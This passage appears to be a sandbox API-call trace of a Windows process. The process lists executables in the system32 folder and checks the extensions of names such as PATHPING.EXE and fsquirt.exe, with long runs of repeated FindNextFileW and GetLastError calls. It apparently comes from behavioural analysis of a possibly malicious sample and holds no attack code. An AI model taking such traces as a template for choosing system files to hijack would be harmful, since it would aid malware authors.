	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.003] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.004] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.005] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] StrRChrW (lpStart="PATHPING.EXE", lpEnd=0x0, wMatch=0x2e) returned=".EXE"
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] StrRChrW (lpStart="regini.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.006] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.006] FindClose (in: hFindFile=0x726a00 | out: hFindFile=0x726a00) returned 1
	[0070.006] GetLastError () returned 0x0
	[0070.006] GetLastError () returned 0x0
	[0070.006] GetLastError () returned 0x0
	[0070.006] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetLastError () returned 0x0
	[0070.007] GetSystemDirectoryW (in: lpBuffer=0x72ee58, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0070.007] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0070.007] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 0x726a00
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.007] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] StrRChrW (lpStart="CloudNotifications.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.008] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.009] StrRChrW (lpStart="fsquirt.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.009] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
	[0070.010] GetLastError () returned 0x0
